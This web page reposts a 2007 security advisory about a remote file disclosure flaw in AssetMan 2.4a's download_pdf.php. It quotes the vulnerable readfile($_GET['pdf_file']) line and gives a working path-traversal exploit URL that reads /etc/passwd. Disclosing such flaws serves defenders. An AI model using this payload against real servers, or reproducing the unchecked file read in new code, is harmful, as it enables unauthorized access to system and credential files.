Computer Security

Security Advisory: AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Fantastico In all Version Cpanel 10.x <= local File Include

  [Full-disclosure] TinyMCE_exp Remote File Include Vulnerability

  Wiki Remote Authentication Bypass Vulnerability

  Remote File Include In ClipShare.v1.5.3

From:BorN To K!LL BorN To K!LL <q.t.i_(at)_hotmail.com>
Date:12.03.2007
Subject:AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
|
|Script: AssetMan
|
|Verson: 2.4a
|
|URL: http://www.bctree.com/~assetman/assetman-2.4a.zip
|
|Discover: BorN To K!LL
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|Bug in:
|download_pdf.php
|
|Code:
|readfile($_GET["pdf_file"]);
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|ExploiT:
|~~~~~
|wWw.SiTe.cOm/[path]/download_pdf.php?pdf_file=../../../../etc/passwd
|
|+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|GreeTz 2:
|Dr.2 - str0ke - AsbMay .....
|
|KuW SeC .... AsbMay's Group ....
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server